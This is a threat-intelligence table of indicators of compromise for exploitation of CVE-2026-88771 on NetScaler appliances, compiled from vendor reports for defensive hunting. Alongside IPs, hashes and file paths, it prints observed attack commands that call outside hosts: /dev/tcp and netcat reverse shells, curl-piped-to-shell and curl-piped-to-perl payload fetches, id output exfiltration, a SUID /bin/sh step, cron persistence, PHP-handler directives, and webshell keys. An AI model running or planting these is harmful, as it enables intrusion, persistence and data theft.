| IPv4 | 194.242.130.193 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (WAHYU, Hong Kong) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 125.122.56.47 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (CHINANET BACKBONE, China) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 23.132.164.35 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Netiface America, Inc., Switzerland) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 92.118.204.229 | GreyNoise tag [56]; LevelBlue SpiderLabs (THOR team) [42] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Catixs Ltd, United States). LevelBlue: source of command-execution testing (e.g. whoami) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. Consumer/ISP address: likely a compromised device or residential proxy; do not block on it. LevelBlue also lists it from its own THOR hunt, not independently confirmed. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 54.70.59.128 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Amazon.com, Inc., United States) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 44.226.128.41 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Amazon.com, Inc., United States) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 4.246.63.96 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Microsoft Corporation, United States) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 176.65.148.54 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 28-29 (Pfcloud UG, Netherlands) | Opportunistic scanning or exploitation attempt seen by GreyNoise sensors after the public PoC; most of these IPs also carry crawler and CitrixBleed 2 tags. A hunting lead, not proof of targeting. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 104.28.193.147 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 29 (Cloudflare, Inc., Japan) | Cloudflare WARP egress address, shared by very many ordinary Cloudflare WARP / 1.1.1.1 users. Never block it and never import it into an IoC feed; use it only to correlate timing within your own logs. | GreyNoise Visualizer tag search, viewed Sep 29 |
| IPv4 | 104.28.211.105 | GreyNoise tag [56] | Tagged by GreyNoise for CVE-2026-88771 exploitation attempts, last seen Sep 29 (Cloudflare, Inc., Japan) | Cloudflare WARP egress address, shared by very many ordinary Cloudflare WARP / 1.1.1.1 users. Never block it and never import it into an IoC feed; use it only to correlate timing within your own logs. | GreyNoise Visualizer tag search, viewed Sep 29 |
| User-Agent | Python-urllib | Lupovis (@LupovisDefence) on X, Sep 28 [62] | Client used for CVE-2026-88771 log-poison exploitation on Lupovis decoys (payload runs id;uname, DNS callback to httpworkbench) | Lupovis honeypot observation (its own post on X, plus press and Beazley). Mostly opportunistic activity after the public PoC. Python-urllib is a common library default; only meaningful together with the auth-endpoint payload. | Public post, no TLP marking |
| URI path | /vpn/scripts/linux/nsgclient18.deb | Maurice_Sec on X [107]; CyberMaxx [52]; Google GTIG / Mandiant [34]; Unit 42 (Palo Alto Networks) [96] | GET requests referenced in a NetScaler Console IoC scanner finding (Maurice_Sec field notes) | Single practitioner report; the author is "not 100%" on this finding. Matches the GTIG nsgclient*.deb staging pattern. A legitimate client package normally lives at similar paths, so check file content, not just the name. | Public post, no TLP marking |
| URI path | /vpn/scripts/linux/nsgclient18_32.deb | Maurice_Sec on X [107]; CyberMaxx [52]; Google GTIG / Mandiant [34] | GET requests referenced in a NetScaler Console IoC scanner finding (Maurice_Sec field notes) | Single practitioner report; the author is "not 100%" on this finding. Matches the GTIG nsgclient*.deb staging pattern. Check file content, not just the name. | Public post, no TLP marking |
| Domain | echvista.com | IFIN [57] | Associated exploit source (IFIN compiled observables) | Compiled by IFIN from shared reports; the original reporter of each value is not stated. No A record when checked on Sep 29. | Public, no restriction |
| SHA-256 | 73b74309f4728d169cc9edfb2767c5aadd75d39b62de93c935a86c777d2646bc | Arctic Wolf [36] | First payload returned from /xd7h/x | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| SHA-256 | 9c7bf01d2c2cb31a3609d27c1bc9abc60d86e37b7f9908547e0c75fb18b99aab | Arctic Wolf [36] | nsmon.pl Perl implant returned from /xd7h/nsmon.pl | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| SHA-256 | 57f9f30c50240fd48d761de7961a430cdebf2c084a36bc76d376a1ce8e6dfa9d | Arctic Wolf [36] | Initial payload in a separate observation involving 62.133.62.80 | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| SHA-256 | 974b69782fdf5d67b97cfd508465939e44ee10798dbcc1e82b92d78776bad938 | Arctic Wolf [36]; LevelBlue SpiderLabs (THOR team) [42] | Perl script update_c08937.pl | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. LevelBlue also lists it from its own THOR hunt, not independently confirmed. | Public GitHub repository, no TLP marking |
| SHA-256 | 927c7fbef2e620c1ce482c3ed67ebf53da97693c1d6c7552c77aec84ba982cf8 | Arctic Wolf [36] | Platypus agent (shell script) retrieved from entretiensol.com | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| IPv4 | 45.141.21.130 | Arctic Wolf [36]; LevelBlue SpiderLabs (THOR team) [42] | Reverse-shell destination: /bin/sh -i to port 443 | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. LevelBlue also lists it from its own THOR hunt, not independently confirmed. | Public GitHub repository, no TLP marking |
| IPv4 | 68.178.160.183 | Arctic Wolf [36] | Payload host on ports 8888 and 8899 (/test, /test111) | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| IPv4 | 89.44.80.7 | Arctic Wolf [36] | Callback host: /exec-ok and Base64 id output on port 65456; nc -e /bin/sh to port 58963 | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| IPv4 | 130.94.42.226 | Arctic Wolf [36] | Callback on port 18805 | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| IPv4 | 134.175.71.50 | Arctic Wolf [36] | Payload host on port 4123 | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| IPv4 | 177.4.12.11 | Arctic Wolf [36] | Served /s?t=a, b and c on port 8080, piped to sh | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| URL | http://64.94.85.67:443/update_c08937.pl | Arctic Wolf [36]; LevelBlue SpiderLabs (THOR team) [42] | Fetched with curl and piped to perl inside the injected username | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. LevelBlue also lists it from its own THOR hunt, not independently confirmed. | Public GitHub repository, no TLP marking |
| URL | http://62.133.62.80:80/xd7h/x | Arctic Wolf [36]; LevelBlue SpiderLabs (THOR team) [42] | First payload fetched by the appliance | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. LevelBlue also lists it from its own THOR hunt, not independently confirmed. | Public GitHub repository, no TLP marking |
| URL | http://62.133.62.80:80/xd7h/nsmon.pl | Arctic Wolf [36] | nsmon.pl implant download | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| URL | http://23.27.143.20:9000/main.py | Arctic Wolf [36]; LevelBlue SpiderLabs (THOR team) [42] | Python payload download | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. LevelBlue also lists it from its own THOR hunt, not independently confirmed. | Public GitHub repository, no TLP marking |
| URL | http://153.75.82.220/download/x.sh | Arctic Wolf [36] | Shell payload, piped to bash | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| Domain | entretiensol.com | Arctic Wolf [36] | Served a Platypus agent over HTTPS (/api/v1/install/...) | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| File path | /var/tmp/.nsmon/nsmon.pl | Arctic Wolf [36] | nsmon.pl copies itself here with 0755 permissions | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| File path | /var/1.py | Arctic Wolf [36] | main.py saved here before execution | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| File path | /var/tmp/.s | Arctic Wolf [36] | File path listed by Arctic Wolf | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| Cron entry | */5 * * * * root perl /var/tmp/.nsmon/nsmon.pl | Arctic Wolf [36] | Cron entry nsmon.pl attempts to add to /etc/crontab or /nsconfig/crontab (attempted persistence) | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| Network | TCP listener on 41000-41999 | Arctic Wolf [36] | nsmon.pl attempts to listen on 0.0.0.0 on a configured port or a free port in this range | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| IPv4 | 78.47.24.217 | Unit 42 (Palo Alto Networks) [96] | Fingerprinting 21-22 Aug; part of the 21 Sep three-stage webshell drop | Unit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw. | Public blog, no TLP marking |
| IPv4 | 66.135.19.18 | Unit 42 (Palo Alto Networks) [96] | One of four VPSs (one per day, 4-8 Sep) requesting nsgclient18.deb and nsgser18.deb | Unit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw. | Public blog, no TLP marking |
| IPv4 | 167.99.111.203 | Unit 42 (Palo Alto Networks) [96] | One of four VPSs (one per day, 4-8 Sep) requesting nsgclient18.deb and nsgser18.deb | Unit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw. | Public blog, no TLP marking |
| IPv4 | 142.93.85.227 | Unit 42 (Palo Alto Networks) [96] | One of four VPSs (one per day, 4-8 Sep) requesting nsgclient18.deb and nsgser18.deb | Unit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw. | Public blog, no TLP marking |
| IPv4 | 104.248.74.206 | Unit 42 (Palo Alto Networks) [96] | One of four VPSs (one per day, 4-8 Sep) requesting nsgclient18.deb and nsgser18.deb | Unit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw. | Public blog, no TLP marking |
| IPv4 | 137.184.91.207 | Unit 42 (Palo Alto Networks) [96] | Requested the same .deb files on 7 Sep | Unit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw. | Public blog, no TLP marking |
| IPv4 | 162.33.178.9 | Unit 42 (Palo Alto Networks) [96] | Requested nsgbuild.deb and nsgsupport.deb on 14 Sep | Unit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw. | Public blog, no TLP marking |
| IPv4 | 193.149.176.207 | Unit 42 (Palo Alto Networks) [96] | Requested nsgbuild.deb daily 15-24 Sep (most of the requests Unit 42 saw) and GetUserName | Unit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw. | Public blog, no TLP marking |
| IPv4 | 45.61.136.143 | Unit 42 (Palo Alto Networks) [96] | Listed in the Unit 42 network indicators | Unit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw. | Public blog, no TLP marking |
| IPv4 | 66.227.183.84 | Unit 42 (Palo Alto Networks) [96] | Listed in the Unit 42 network indicators | Unit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw. | Public blog, no TLP marking |
| IPv4 | 216.245.184.164 | Unit 42 (Palo Alto Networks) [96] | Listed in the Unit 42 network indicators | Unit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw. | Public blog, no TLP marking |
| IPv4 | 104.28.215.137 | Unit 42 (Palo Alto Networks) [96] | Requested .deb webshell files 9-11 Sep; GetUserName stream (Cloudflare WARP) | Cloudflare WARP egress address, shared by very many ordinary Cloudflare WARP / 1.1.1.1 users. Never block it and never import it into an IoC feed; use it only to correlate timing within your own logs. | Public blog, no TLP marking |
| IPv4 | 104.28.247.136 | Unit 42 (Palo Alto Networks) [96] | Requested .deb webshell files 9-11 Sep; GetUserName stream (Cloudflare WARP) | Cloudflare WARP egress address, shared by very many ordinary Cloudflare WARP / 1.1.1.1 users. Never block it and never import it into an IoC feed; use it only to correlate timing within your own logs. | Public blog, no TLP marking |
| IPv4 | 104.28.215.136 | Unit 42 (Palo Alto Networks) [96] | Requested .deb webshell files 9-11 Sep; GetUserName stream (Cloudflare WARP) | Cloudflare WARP egress address, shared by very many ordinary Cloudflare WARP / 1.1.1.1 users. Never block it and never import it into an IoC feed; use it only to correlate timing within your own logs. | Public blog, no TLP marking |
| IPv4 | 104.28.247.137 | Unit 42 (Palo Alto Networks) [96] | GetUserName request stream 10-27 Sep (Cloudflare WARP) | Cloudflare WARP egress address, shared by very many ordinary Cloudflare WARP / 1.1.1.1 users. Never block it and never import it into an IoC feed; use it only to correlate timing within your own logs. | Public blog, no TLP marking |
| SHA-256 | ae22ef2517b5c0fb47f78745b9cb5260acee0e751b89bcd354640ff8bc8d29ec | Unit 42 (Palo Alto Networks) [96] | nsg64.deb PHP webshell: RC4-encrypted C2 with exec, upload and file exfiltration; privilege escalation through the legitimate SUID binary /var/netscaler/.ns_suidcmd | Unit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw. | Public blog, no TLP marking |
| SHA-256 | 1bd314b661396c7086f6367fbbb48025e03ca2de69c073d53a8b0a38aa5fbb7d | Unit 42 (Palo Alto Networks) [96] | Text of Unit 42 Figure 1 (Base64 payload) | Unit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw. Hash of a text file reproducing the figure, so it will not match on-disk artefacts. | Public blog, no TLP marking |
| SHA-256 | 79c65fa04541032e251fa4796b97800374b63c7982593dd1a2e0db605d429186 | Unit 42 (Palo Alto Networks) [96] | Text of Unit 42 Figure 2 (decoded shell script) | Unit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw. Hash of a text file reproducing the figure, so it will not match on-disk artefacts. | Public blog, no TLP marking |
| URI path | /vpn/scripts/linux/nsg64.deb | Unit 42 (Palo Alto Networks) [96] | .deb webshell name requested 4-24 Sep | Unit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw. | Public blog, no TLP marking |
| URI path | /vpn/scripts/linux/nsgser18.deb | Unit 42 (Palo Alto Networks) [96] | .deb webshell name requested 4-24 Sep | Unit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw. | Public blog, no TLP marking |
| URI path | /vpn/scripts/linux/nsgsupport.deb | Unit 42 (Palo Alto Networks) [96] | .deb webshell name requested 4-24 Sep | Unit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw. | Public blog, no TLP marking |
| URI path | /vpn/scripts/linux/nsgpackage64.deb | Unit 42 (Palo Alto Networks) [96] | .deb webshell name requested 4-24 Sep | Unit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw. | Public blog, no TLP marking |
| URI path | /vpn/scripts/linux/nsgbuild.deb | Unit 42 (Palo Alto Networks) [96] | .deb webshell name requested 4-24 Sep | Unit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw. | Public blog, no TLP marking |
| URI path | /logon/LogonPoint/Authentication/GetUserName | Unit 42 (Palo Alto Networks) [96] | Continuous request stream 10-27 Sep; Unit 42 believes any activity to this path is anomalous | Unit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw. | Public blog, no TLP marking |
| URI path | /admin_ui/common/css/ns/ui.css | Unit 42 (Palo Alto Networks) [96] | Requested 21-22 Aug for version fingerprinting | Legitimate NetScaler file used for fingerprinting, not an IoC on its own. Hunt for requests from the listed IPs or unusual sources. | Public blog, no TLP marking |
| URI path | /vpn/js/rdx/core/lang/rdx_en.json.gz | Unit 42 (Palo Alto Networks) [96] | Requested 21-22 Aug for version fingerprinting | Legitimate NetScaler file used for fingerprinting, not an IoC on its own. Hunt for requests from the listed IPs or unusual sources. | Public blog, no TLP marking |
| Cookie value | e826d7ddf3c85920 | Unit 42 (Palo Alto Networks) [96] | CsrfToken value that unlocks the .ctxs.receiver webshell; the NSC_TASS cookie carries the command | Unit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw. Unit 42 calls it a per-implant password; other intrusions may use other tokens. | Public blog, no TLP marking |
| RC4 key | 7489a0f93c67fa5cdaeb4b921d90594d | Unit 42 (Palo Alto Networks) [96] | nsg64.deb C2 key: MD5 of the hard-coded passphrase Rhfajaf1H992; operators authenticate with the k parameter | Unit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw. | Public blog, no TLP marking |
| Command | chmod 6555 /bin/sh | Unit 42 (Palo Alto Networks) [96] | First step of the decoded .ctxs.receiver installer: sets SUID and SGID on /bin/sh | Unit 42 incident observation. The actor rotated infrastructure, so values may be specific to the victims Unit 42 saw. | Public blog, no TLP marking |
| IPv4 | 45.76.34.141 | Sygnia [37] | Sygnia confidence High: observed in malicious AAA events | Sygnia investigation-derived, context-specific indicator, not Citrix-published. Validate ownership, NAT and direction before blocking. | Public advisory, no TLP marking |
| IPv4 | 170.64.176.26 | Sygnia [37] | Sygnia confidence High: associated with activity in an active IR investigation | Sygnia investigation-derived, context-specific indicator, not Citrix-published. Validate ownership, NAT and direction before blocking. | Public advisory, no TLP marking |
| IPv4 | 209.250.236.77 | Sygnia [37] | Sygnia confidence Medium: time-correlated with exploit-style activity | Sygnia investigation-derived, context-specific indicator, not Citrix-published. Validate ownership, NAT and direction before blocking. | Public advisory, no TLP marking |
| IPv4 | 138.68.21.29 | Sygnia [37] | Sygnia confidence Medium: strong temporal and service-path correlation | Sygnia investigation-derived, context-specific indicator, not Citrix-published. Validate ownership, NAT and direction before blocking. | Public advisory, no TLP marking |
| File path | /var/netscaler/gui/vpn/scripts/linux/1bd8a664.sig | Sygnia [37] | Suspicious .sig file in a web-accessible directory | Sygnia investigation-derived, context-specific indicator, not Citrix-published. Validate ownership, NAT and direction before blocking. | Public advisory, no TLP marking |
| File path | /netscaler/ns_gui/vpn/c88771.json | Sygnia [37] | Suspicious JSON artefact in the VPN web directory | Sygnia investigation-derived, context-specific indicator, not Citrix-published. Validate ownership, NAT and direction before blocking. | Public advisory, no TLP marking |
| File path | /var/netscaler/logon/insight-new.js | Sygnia [37]; LevelBlue SpiderLabs (THOR team) [42] | Target of an attempted copy of /flash/nsconfig/ns.conf (configuration exposure) | Sygnia investigation-derived, context-specific indicator, not Citrix-published. Validate ownership, NAT and direction before blocking. LevelBlue also lists it from its own THOR hunt, not independently confirmed. | Public advisory, no TLP marking |
| File name | 80974ca9.sig | Sygnia [37] | Artefact in a NetScaler web-accessible directory | Sygnia investigation-derived, context-specific indicator, not Citrix-published. Validate ownership, NAT and direction before blocking. | Public advisory, no TLP marking |
| File name | LoginIcon.sig | Sygnia [37] | Artefact in a NetScaler web-accessible directory | Sygnia investigation-derived, context-specific indicator, not Citrix-published. Validate ownership, NAT and direction before blocking. | Public advisory, no TLP marking |
| Apache directive | AddHandler application/x-httpd-php .css | Sygnia [37] | Makes CSS-looking files run as PHP | Sygnia investigation-derived, context-specific indicator, not Citrix-published. Validate ownership, NAT and direction before blocking. | Public advisory, no TLP marking |
| Apache directive | AddHandler application/x-httpd-php .ico | Sygnia [37] | Makes icon-looking files run as PHP | Sygnia investigation-derived, context-specific indicator, not Citrix-published. Validate ownership, NAT and direction before blocking. | Public advisory, no TLP marking |
| NetScaler log line | AAA LOGIN_FAILED: User pitboss PPE unexpectedly died NSPPE;curl http://64.94.85.67:443/update_c08937.pl | perl;# X - Client_ip 64.94.85.67 - Failure_reason "External authentication server denied access" | Arctic Wolf [36] | Failed login with the injected command as the username. Appliance-side line from production telemetry; the same pattern Lupovis saw in HTTP bodies on its decoys. | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. Shows the command reached the authentication logging path, not that it ran; correlate with process and file evidence. | Public GitHub repository, no TLP marking |
| NetScaler log line | AAA LOGIN REQ: parsed data; username: <pitboss PPE unexpectedly died NSPPE;curl http://64.94.85.67:443/update_c08937.pl | perl;# X> | Arctic Wolf [36] | AAA parses the injected username. Appliance-side line from production telemetry; the same pattern Lupovis saw in HTTP bodies on its decoys. | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. Shows the command reached the authentication logging path, not that it ran; correlate with process and file evidence. | Public GitHub repository, no TLP marking |
| NetScaler log line | AAAD API: sending login req to aaad for <pitboss PPE unexpectedly died NSPPE;curl http://64.94.85.67:443/update_c08937.pl | perl;# X>, factor <...>, auth type 4129 | Arctic Wolf [36] | SSLVPN message passing the username to aaad. Appliance-side line from production telemetry; the same pattern Lupovis saw in HTTP bodies on its decoys. | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. Shows the command reached the authentication logging path, not that it ran; correlate with process and file evidence. | Public GitHub repository, no TLP marking |
| NetScaler log line | Authentication delegated to Packet engine for pitboss PPE unexpectedly died NSPPE;curl http://64.94.85.67:443/update_c08937.pl | perl;# X, trying to find appropriate action with bitmask 1 | Arctic Wolf [36] | AAATM message. Appliance-side line from production telemetry; the same pattern Lupovis saw in HTTP bodies on its decoys. | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. Shows the command reached the authentication logging path, not that it ran; correlate with process and file evidence. | Public GitHub repository, no TLP marking |
| URL | http://31.56.197.72:9090/lula | Arctic Wolf [36]; LevelBlue SpiderLabs (THOR team) [42] | Payload URL | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. LevelBlue also lists it from its own THOR hunt, not independently confirmed. | Public GitHub repository, no TLP marking |
| URL | http://31.56.197.72/lula | Arctic Wolf [36] | Payload URL | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| URL | http://31.56.197.72/kk | Arctic Wolf [36] | Payload URL | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| URL | http://68.178.160.183:8899/test111 | Arctic Wolf [36] | Payload URL | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| URL | http://68.178.160.183:8888/test | Arctic Wolf [36] | Payload URL | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| URL | http://89.44.80.7:65456/exec-ok | Arctic Wolf [36] | Execution-check callback | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| URL | http://89.44.80.7:65456/$(id|base64 -w0) | Arctic Wolf [36] | Callback carrying Base64 id output | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| URL | http://130.94.42.226:18805/?t=<REDACTED> | Arctic Wolf [36] | Callback (token redacted by Arctic Wolf) | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| URL | http://134.175.71.50:4123/1 | Arctic Wolf [36] | Payload URL | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| URL | http://177.4.12.11:8080/s?t=a | Arctic Wolf [36] | Fetched with curl -sk and piped to sh | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| URL | http://177.4.12.11:8080/s?t=b | Arctic Wolf [36] | Fetched with curl -sk and piped to sh | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| URL | http://177.4.12.11:8080/s?t=c | Arctic Wolf [36] | Payload URL | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| URL | https://entretiensol.com:443/api/v1/install/<REDACTED> | Arctic Wolf [36] | Platypus agent install, fetched with curl -fsSL --tlsv1.2 -k (path redacted by Arctic Wolf) | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| Command | /bin/sh -i >& /dev/tcp/45.141.21.130/443 0>&1 | Arctic Wolf [36] | Bash reverse shell, observed in the injected username | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| Command | nc -e /bin/sh 89.44.80.7 58963 | Arctic Wolf [36] | Netcat reverse shell, observed in the injected username | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| Command | id|base64 -w0 | Arctic Wolf [36] | Command-output exfiltration over HTTP, observed in the injected username | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| Command | curl -fsSL http://153.75.82.220/download/x.sh | bash | Arctic Wolf [36] | Remote shell script execution, observed in the injected username | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| Command | curl -sk 177.4.12.11:8080/s?t=a|sh | Arctic Wolf [36] | Remote shell script execution, observed in the injected username | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| IPv4 | 70.172.58.168 | LevelBlue SpiderLabs (THOR team) [42] | Source of NetScaler exploitation attempts | LevelBlue THOR hunt finding across its own customer environments; not independently confirmed. Use as a hunting pivot, not a blocklist. | Public blog, no TLP marking |
| IPv4 | 162.243.36.88 | LevelBlue SpiderLabs (THOR team) [42] | Source of NetScaler exploitation attempts | LevelBlue THOR hunt finding across its own customer environments; not independently confirmed. Use as a hunting pivot, not a blocklist. | Public blog, no TLP marking |
| IPv4 | 173.40.135.209 | LevelBlue SpiderLabs (THOR team) [42] | Source of NetScaler exploitation attempts | LevelBlue THOR hunt finding across its own customer environments; not independently confirmed. Use as a hunting pivot, not a blocklist. | Public blog, no TLP marking |
| IPv4 | 47.230.224.154 | LevelBlue SpiderLabs (THOR team) [42] | Source of NetScaler exploitation attempts | LevelBlue THOR hunt finding across its own customer environments; not independently confirmed. Use as a hunting pivot, not a blocklist. | Public blog, no TLP marking |
| SHA-256 | e9fe43968c6c0955300e3bc4d7fb0b05a18570b4733aaf4f5c6f7f09be5a242c | LevelBlue SpiderLabs (THOR team) [42] | main.py: overwrites /var/python/bin/customsnmpd with a Python reverse shell to 45.141.21.130:443 and kills the running customsnmpd | LevelBlue THOR hunt finding across its own customer environments; not independently confirmed. Use as a hunting pivot, not a blocklist. | Public blog, no TLP marking |
